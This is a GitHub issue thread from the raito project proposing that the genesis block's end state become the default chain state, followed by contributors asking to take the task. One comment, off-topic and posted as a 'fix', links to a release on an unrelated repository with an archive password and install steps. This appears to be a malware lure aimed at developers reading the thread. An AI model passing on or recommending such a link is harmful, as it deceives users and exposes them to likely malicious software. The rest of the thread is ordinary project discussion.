### ISSUE TITLE
[feat] Use chain state at the end of genesis block as the default

### ISSUE THREAD

**Issue by m-kus** [keep-starknet-strange/raito#114]
Currently default chain state is before genesis block is applied. It allows to validate the block 0 but the downsides are:
- we need to use option for the block height to differentiate between -1 and 0 states
- we need special logic to handle the genesis block

It would be more convenient to start from the chain state at the end of the genesis block (similarly to how it's done in bitcoin core).

What has to be done:
- Use u32 for block height instead of option 
- Remove next block height helper, now it's just +1
- Ipdate ChainStateDefault implementation 
- Update tests using genesis block to use another one
- Exclude genesis block from the script

**Comment by Jostino** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ScottyDavies** [comment]
Hello @m-kus i would love to take up this issue

**Comment by ScottyDavies** [comment]
@m-kus I can't find the issue on onlydust!

**Comment by Jeanmichel7** [comment]
I've already worked on it, can I continue?

**Comment by maciejka** [comment]
@Jeanmichel7  what is the status of the issue? We would like to complete all Milestone 1 issues soon. Do need need any help?

**Comment by Jeanmichel7** [comment]
@maciejka No particular worries, I think I'll be able to push tomorrow
